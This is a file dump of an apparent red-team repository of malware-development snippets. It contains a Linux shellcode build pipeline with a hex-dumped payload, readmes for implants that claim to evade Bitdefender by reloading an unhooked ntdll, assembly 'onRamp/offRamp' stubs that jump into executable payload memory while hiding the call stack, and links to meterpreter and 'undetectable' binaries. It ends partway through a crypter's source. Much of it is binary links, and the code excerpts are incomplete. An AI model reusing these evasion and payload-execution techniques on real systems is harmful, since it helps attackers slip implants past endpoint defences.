-------------------------------------------------------------------------------- /C/code_exec/Readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /C/code_exec/system.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C/code_exec/system.bin -------------------------------------------------------------------------------- /C/custom_payload/Readme.md: -------------------------------------------------------------------------------- 1 | All the files necessary to compile and run custom Linux payloads. 2 | -------------------------------------------------------------------------------- /C/custom_payload/beautify.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | __author__ = "0xTriboulet" 4 | 5 | with open("dump.txt") as f: 6 | lines = f.readlines() 7 | last = lines[-1] 8 | print("unsigned char cmd[] = ") 9 | for line in lines: 10 | new_line = [] 11 | for i in range (0,len(line)-1,2): 12 | new_line.append("\\x"+line[i:i+2]) 13 | if line is last: 14 | print('"'+''.join(new_line)+'";') 15 | else: 16 | print('"'+''.join(new_line)+'"') 17 | -------------------------------------------------------------------------------- /C/custom_payload/call_me: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C/custom_payload/call_me -------------------------------------------------------------------------------- /C/custom_payload/call_me.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C/custom_payload/call_me.o -------------------------------------------------------------------------------- /C/custom_payload/call_me_2.bak: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C/custom_payload/call_me_2.bak -------------------------------------------------------------------------------- /C/custom_payload/dump.txt: -------------------------------------------------------------------------------- 1 | 4889e54883ec4848b82f7573722f6269 2 | 6e48ba2f6563686f000000488955d848 3 | 8945d0488d5dd053488d1c246a0048b8 4 | 5041594c4f41442048ba474f45532048 5 | 4552b94521000048894df0488955e848 6 | 8945e0488d4de05151488d3424488b3b 7 | ba00000000b83b0000000f05b83c0000 8 | 000f05002e7368737472746162002e74 9 | 657874000 10 | -------------------------------------------------------------------------------- /C/custom_payload/how-to: -------------------------------------------------------------------------------- 1 | nasm -f elf64 -o call_me.o call_me.asm -l call_me.assembly -O3 2 | ld -m elf_x86_64 -N -s -o call_me call_me.o 3 | hexdump ./call_me -v -e '16/1 "%02x" "\n"' -n 300 > dump.txt 4 | python beautify.py 5 | copy into payload section of system.c 6 | gcc -m64 -g system.c -o system.bin -O0 7 | ./system.bin 8 | 9 | -------------------------------------------------------------------------------- /C/custom_payload/system.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C/custom_payload/system.bin -------------------------------------------------------------------------------- /C/custom_payload/useful.txt: -------------------------------------------------------------------------------- 1 | hexdump -s 0x1139 ./payload.bin -v -e '16/1 "%02x" "\n"' -n 200 2 | -------------------------------------------------------------------------------- /C/meterpreter/Readme.md: -------------------------------------------------------------------------------- 1 | Repository of meterpreter binaries aimed at facilitating research 2 | -------------------------------------------------------------------------------- /C/meterpreter/meterpreter_re_me.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C/meterpreter/meterpreter_re_me.exe -------------------------------------------------------------------------------- /C/meterpreter/patchmeup_meterpreter.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C/meterpreter/patchmeup_meterpreter.exe -------------------------------------------------------------------------------- /C/undetectable/compile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | x86_64-w64-mingw32-gcc.exe .\undetectable.c -o undetectable.exe -l"ws2_32" -Wdiscarded-qualifiers -------------------------------------------------------------------------------- /C/undetectable/undetectable.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C/undetectable/undetectable.exe -------------------------------------------------------------------------------- /Certs/Certificate-Steve S.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/Certificate-Steve S.pdf -------------------------------------------------------------------------------- /Certs/Machine_Learning_for_Red_Teams_Steve S - 2024-06-05.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/Machine_Learning_for_Red_Teams_Steve S - 2024-06-05.pdf -------------------------------------------------------------------------------- /Certs/Malware Development Advanced - Vol.1-certificate.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/Malware Development Advanced - Vol.1-certificate.pdf -------------------------------------------------------------------------------- /Certs/Malware Development Advanced - Vol.2-certificate.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/Malware Development Advanced - Vol.2-certificate.pdf -------------------------------------------------------------------------------- /Certs/RTMLS_2024-06-14.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/RTMLS_2024-06-14.pdf -------------------------------------------------------------------------------- /Certs/Readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Certs/Red-Team-Ops-Completion.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/Red-Team-Ops-Completion.jpg -------------------------------------------------------------------------------- /Certs/Red-Team-Ops-II-Completion.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/Red-Team-Ops-II-Completion.jpg -------------------------------------------------------------------------------- /Certs/Sektor7_Malware Development Essentials-certificate.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/Sektor7_Malware Development Essentials-certificate.pdf -------------------------------------------------------------------------------- /Certs/Sektor7_Malware Development Intermediate-certificate.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/Sektor7_Malware Development Intermediate-certificate.pdf -------------------------------------------------------------------------------- /Certs/Sektor7_Windows Evasion-certificate.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/Sektor7_Windows Evasion-certificate.pdf -------------------------------------------------------------------------------- /Certs/THM-JrPenTester.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/THM-JrPenTester.png -------------------------------------------------------------------------------- /Certs/THM-Offensive_Pentesting.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/THM-Offensive_Pentesting.png -------------------------------------------------------------------------------- /Certs/THM-Red_Team_Learning_Path.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/THM-Red_Team_Learning_Path.png -------------------------------------------------------------------------------- /Certs/Udemy_Linux-PEAS.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/Udemy_Linux-PEAS.jpg -------------------------------------------------------------------------------- /Certs/Udemy_RE-Exploit-Dev.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/Udemy_RE-Exploit-Dev.jpg -------------------------------------------------------------------------------- /Certs/Udemy_RE-Malware-Net-Java.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/Udemy_RE-Malware-Net-Java.jpg -------------------------------------------------------------------------------- /Certs/Udemy_RE-Radare2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/Udemy_RE-Radare2.jpg -------------------------------------------------------------------------------- /Certs/Udemy_RE-Windows-GUI.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/Udemy_RE-Windows-GUI.jpg -------------------------------------------------------------------------------- /Certs/Udemy_Windows-PEAS.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/Udemy_Windows-PEAS.jpg -------------------------------------------------------------------------------- /Certs/Udemy_build_undetectable_malware_in_c.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/Udemy_build_undetectable_malware_in_c.jpg -------------------------------------------------------------------------------- /Certs/VHL_Advanced+_Certificate.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/VHL_Advanced+_Certificate.pdf -------------------------------------------------------------------------------- /Certs/VHL_Basic_Certificate.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/VHL_Basic_Certificate.pdf -------------------------------------------------------------------------------- /Certs/ZPS_DevOps_For_Pentesters.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/ZPS_DevOps_For_Pentesters.jpg -------------------------------------------------------------------------------- /Certs/zps_initial_access_cert.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/zps_initial_access_cert.jpg -------------------------------------------------------------------------------- /Cpp/BYOdll/version1/Readme.md: -------------------------------------------------------------------------------- 1 | Beats Bitdefender by unhooking using a clean copy of ntdll hardcoded into the binary. Unfortunately has to drop the copy of ntdll to disk before loading it, still working on a way around that. 2 | -------------------------------------------------------------------------------- /Cpp/BYOdll/version1/beautify.py: -------------------------------------------------------------------------------- 1 | import sys 2 | 3 | try: 4 | plaintext = open(sys.argv[1], "rb").read() 5 | except: 6 | print("File argument needed! %s " % sys.argv[0]) 7 | sys.exit() 8 | 9 | 10 | #open("payload.out",'wb').write(plaintext) 11 | print('unsigned char payload[] = { 0x' + ', 0x'.join(hex(ord(x))[2:] for x in plaintext) + ' };') -------------------------------------------------------------------------------- /Cpp/BYOdll/version1/compile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /Od /MT /W1 /GS- /DNDEBUG /EHsc /Tp *.cpp /link /OUT:implant.exe /SUBSYSTEM:CONSOLE /MACHINE:x64 4 | del *.obj -------------------------------------------------------------------------------- /Cpp/BYOdll/version1/implant.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/BYOdll/version1/implant.exe -------------------------------------------------------------------------------- /Cpp/BYOdll/version2/Readme.md: -------------------------------------------------------------------------------- 1 | Beats BitDefender by unhooking all function calls by reloading ntdll hardcoded into the binary. ntdll is stored as a local variable in main so this program needs a BEEFY stack to manage it. This program suffers from the same limitation of dropping the hardcoded copy of ntdll to disk before loading. 2 | -------------------------------------------------------------------------------- /Cpp/BYOdll/version2/compile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /EHsc /Tp *.cpp /link /OUT:implant.exe /SUBSYSTEM:CONSOLE /MACHINE:x64 /STACK:4000000 4 | del *.obj -------------------------------------------------------------------------------- /Cpp/BYOdll/version2/implant.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/BYOdll/version2/implant.exe -------------------------------------------------------------------------------- /Cpp/BYOdll/version3/Readme.md: -------------------------------------------------------------------------------- 1 | This version loads a reflective NTDLL, copies it over (overwrites) the hooked NTDLL, and is then free to execute malicious behaviors. 2 | -------------------------------------------------------------------------------- /Cpp/BYOdll/version3/compile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /Od /MT /W0 /GS- /DNDEBUG /Tpimplant.cpp /link /OUT:implant.exe /SUBSYSTEM:CONSOLE /MACHINE:x64 -------------------------------------------------------------------------------- /Cpp/Readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Cpp/badAsm/badAsm.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/badAsm/badAsm.exe -------------------------------------------------------------------------------- /Cpp/badAsm/badAsm_better.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/badAsm/badAsm_better.exe -------------------------------------------------------------------------------- /Cpp/badAsm/badAsm_rx.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/badAsm/badAsm_rx.exe -------------------------------------------------------------------------------- /Cpp/bad_fn_ptr/bad_fn_ptr/bad_fn_ptr.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Cpp/bad_fn_ptr/bad_fn_ptr/bad_fn_ptr.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/bad_fn_ptr.exe.recipe: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | C:\Users\0xtriboulet\Desktop\maldev\Zz.Projects\experiments\9.bad_fn_ptr\bad_fn_ptr\x64\Debug\bad_fn_ptr.exe 6 | 7 | 8 | 9 | 10 | 11 | -------------------------------------------------------------------------------- /Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/bad_fn_ptr.log: -------------------------------------------------------------------------------- 1 |  bad_fn_ptr.cpp 2 | Creating library C:\Users\0xtriboulet\Desktop\maldev\Zz.Projects\experiments\9.bad_fn_ptr\bad_fn_ptr\x64\Debug\bad_fn_ptr.lib and object C:\Users\0xtriboulet\Desktop\maldev\Zz.Projects\experiments\9.bad_fn_ptr\bad_fn_ptr\x64\Debug\bad_fn_ptr.exp 3 | bad_fn_ptr.vcxproj -> C:\Users\0xtriboulet\Desktop\maldev\Zz.Projects\experiments\9.bad_fn_ptr\bad_fn_ptr\x64\Debug\bad_fn_ptr.exe 4 | -------------------------------------------------------------------------------- /Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/bad_fn_ptr.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/bad_fn_ptr.obj -------------------------------------------------------------------------------- /Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/bad_fn_ptr.tlog/CL.command.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/bad_fn_ptr.tlog/CL.command.1.tlog -------------------------------------------------------------------------------- /Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/bad_fn_ptr.tlog/CL.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/bad_fn_ptr.tlog/CL.read.1.tlog -------------------------------------------------------------------------------- /Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/bad_fn_ptr.tlog/CL.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/bad_fn_ptr.tlog/CL.write.1.tlog -------------------------------------------------------------------------------- /Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/bad_fn_ptr.tlog/bad_fn_ptr.lastbuildstate: -------------------------------------------------------------------------------- 1 | PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.34.31933:TargetPlatformVersion=10.0.22621.0: 2 | Debug|x64|C:\Users\0xtriboulet\Desktop\maldev\Zz.Projects\experiments\9.bad_fn_ptr\bad_fn_ptr\| 3 | -------------------------------------------------------------------------------- /Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/bad_fn_ptr.tlog/link.command.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/bad_fn_ptr.tlog/link.command.1.tlog -------------------------------------------------------------------------------- /Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/bad_fn_ptr.tlog/link.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/bad_fn_ptr.tlog/link.read.1.tlog -------------------------------------------------------------------------------- /Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/bad_fn_ptr.tlog/link.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/bad_fn_ptr.tlog/link.write.1.tlog -------------------------------------------------------------------------------- /Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/bad_fn_ptr.tlog/link.write.2u.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/bad_fn_ptr.tlog/link.write.2u.tlog -------------------------------------------------------------------------------- /Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/vc143.idb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/vc143.idb -------------------------------------------------------------------------------- /Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/vc143.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/vc143.pdb -------------------------------------------------------------------------------- /Cpp/bad_fn_ptr/x64/Debug/bad_fn_ptr.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/bad_fn_ptr/x64/Debug/bad_fn_ptr.exe -------------------------------------------------------------------------------- /Cpp/bad_fn_ptr/x64/Debug/bad_fn_ptr.exp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/bad_fn_ptr/x64/Debug/bad_fn_ptr.exp -------------------------------------------------------------------------------- /Cpp/bad_fn_ptr/x64/Debug/bad_fn_ptr.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/bad_fn_ptr/x64/Debug/bad_fn_ptr.lib -------------------------------------------------------------------------------- /Cpp/bad_fn_ptr/x64/Debug/bad_fn_ptr.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/bad_fn_ptr/x64/Debug/bad_fn_ptr.pdb -------------------------------------------------------------------------------- /Cpp/call_stack/compile.bat: -------------------------------------------------------------------------------- 1 | nasm -f win64 payload.asm -o payload.o 2 | nasm -f win64 ramp.asm -o ramp.o 3 | x86_64-w64-mingw32-g++.exe main_clean.cpp ramp.o -o main_clean.exe -masm=intel -------------------------------------------------------------------------------- /Cpp/call_stack/main_clean.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/call_stack/main_clean.exe -------------------------------------------------------------------------------- /Cpp/call_stack/main_dirty.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/call_stack/main_dirty.exe -------------------------------------------------------------------------------- /Cpp/call_stack/payload.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/call_stack/payload.o -------------------------------------------------------------------------------- /Cpp/call_stack/ramp.asm: -------------------------------------------------------------------------------- 1 | section .text 2 | default rel 3 | bits 64 4 | 5 | global onRamp 6 | global offRamp 7 | 8 | ;nasm -f win64 ramp.asm -o ramp.o 9 | onRamp: ; onRamp(exec_mem, return_address) where &exec_mem in rcx 10 | pop rax ; corrupt previous frame 11 | push rdx 12 | lea rax, [offRamp] ; get offRemp address 13 | push rax ; if payload returns, it'll return to our off ramp 14 | jmp rcx ; execute exec_mem 15 | 16 | offRamp: ; slide back into normal execution (dangerous!) 17 | mov rax, [r13] ; get return_address 18 | jmp rax ; jump to return_address 19 | nop ; This works for the demonstration but depending on your implant/payload you'll need custom offRamps -------------------------------------------------------------------------------- /Cpp/call_stack/ramp.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/call_stack/ramp.o -------------------------------------------------------------------------------- /Cpp/clean_stacks/baseline.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/clean_stacks/baseline.exe -------------------------------------------------------------------------------- /Cpp/clean_stacks/implant.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/clean_stacks/implant.exe -------------------------------------------------------------------------------- /Cpp/clean_stacks/implant_backup_1.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | // x86_64-w64-mingw32-g++.exe implant.cpp -o implant.exe -masm=intel 5 | 6 | /* Reference 7 | asm ( "assembly code" 8 | : output operands optional 9 | : input operands optional 10 | : list of clobbered registers optional 11 | ); 12 | */ 13 | 14 | extern "C" void onRamp(PVOID exec_mem, PVOID ret_addr); 15 | 16 | int main(void){ 17 | printf("Implant running...\n"); 18 | 19 | void * ret_addr = NULL; 20 | asm("lea %0, [rip+ReturnHere];" 21 | : "=r" (ret_addr) // ret_addr <- rip+ReturnHere 22 | : // no inputs 23 | : // no predefined clobbers 24 | ); 25 | 26 | printf("Return address: %p\n",ret_addr); // get return address 27 | 28 | asm("int3; ReturnHere:;"); //ret_addr 29 | printf("Exiting implant...\n"); 30 | } 31 | 32 | 33 | // nasm -f win64 payload.asm -o payload.o 34 | // nasm -f win64 ramp.asm -o ramp.o 35 | // x86_64-w64-mingw32-g++.exe implant.cpp -o implant.exe -masm=intel -------------------------------------------------------------------------------- /Cpp/clean_stacks/payload.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/clean_stacks/payload.o -------------------------------------------------------------------------------- /Cpp/clean_stacks/ramp.asm: -------------------------------------------------------------------------------- 1 | section .text 2 | default rel 3 | bits 64 4 | 5 | global onRamp 6 | 7 | onRamp: ; onRamp (exec_mem, return_address) // rcx, rdx 8 | mov r13, rdx ; preserve our return address 9 | push r13 ; put return_address on the stack 10 | lea r13, [rsp] ; get return_address 11 | 12 | lea r15, offRamp ; preserve offRamp address 13 | push r15 ; put r15 on the stack 14 | lea r15, [rsp] ; get offRamp address 15 | 16 | sub rsp, 0x20 ; protect our addresses 17 | 18 | jmp rcx ; jmp to our payload 19 | 20 | offRamp: 21 | 22 | loop: 23 | pop rax ; pop value off the stack 24 | cmp rsp,r13 ; check if r15 = rsp 25 | jne loop ; loop if there's still garbage on the stack 26 | 27 | ret 28 | 29 | 30 | -------------------------------------------------------------------------------- /Cpp/clean_stacks/ramp.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/clean_stacks/ramp.o -------------------------------------------------------------------------------- /Cpp/create_process/CreateProcess.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | int main(){ 5 | 6 | STARTUPINFO si; 7 | si.cb = sizeof(si); //THE CB MEMBER OF STARTUPINFO SHOULD CONTAIN THE SIZE OF THE STRUCTURE TAKEN FROM THE CREATEPROCESSW DOC 8 | ZeroMemory(&si, sizeof(si)); //ZERO OUT THE MEMORY TO ENSURE THERE IS NO DATA IN THE REGION PRIOR TO USE 9 | 10 | PROCESS_INFORMATION pi; 11 | ZeroMemory(&pi, sizeof(pi));//ZERO THIS OUT TOO 12 | //NOW WE'RE READY TO CALL CREATE PROCESS 13 | 14 | BOOL success = CreateProcess( 15 | "C:\\Windows\\System32\\notepad.exe", 16 | NULL, 17 | 0, 18 | 0, 19 | FALSE, 20 | 0, 21 | NULL, 22 | "C:\\Windows\\System32", 23 | &si, 24 | &pi); 25 | 26 | if (success){ 27 | printf("Process created with PID: %d\n",pi.dwProcessId); 28 | return 0; 29 | 30 | }else{ 31 | printf("Failed to create process. Error code: %d\n", GetLastError()); 32 | return 1; 33 | } 34 | 35 | } -------------------------------------------------------------------------------- /Cpp/create_process/CreateProcess.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/create_process/CreateProcess.exe -------------------------------------------------------------------------------- /Cpp/create_process/Readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Cpp/crypter/compile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /Od /MT /W0 /GS- /DNDEBUG /Tpmain.cpp /EHsc /link /OUT:crypter.exe /SUBSYSTEM:CONSOLE /MACHINE:x64 -------------------------------------------------------------------------------- /Cpp/crypter/crypter.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/crypter/crypter.exe -------------------------------------------------------------------------------- /Cpp/crypter/main.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | int main(int argc, char* argv[]) { 5 | // Check if enough arguments were passed 6 | if (argc < 3) { 7 | std::cerr << "Usage: " << argv[0] << " " << std::endl; 8 | return 1; 9 | } 10 | 11 | // Open the input file 12 | std::ifstream input_file(argv[1], std::ios::binary); 13 | if (!input_file) { 14 | std::cerr << "Error: Could not open input file " << argv[1] << std::endl; 15 | return 1; 16 | } 17 | 18 | // Open the output file 19 | std::ofstream output_file(argv[2], std::ios::binary); 20 | if 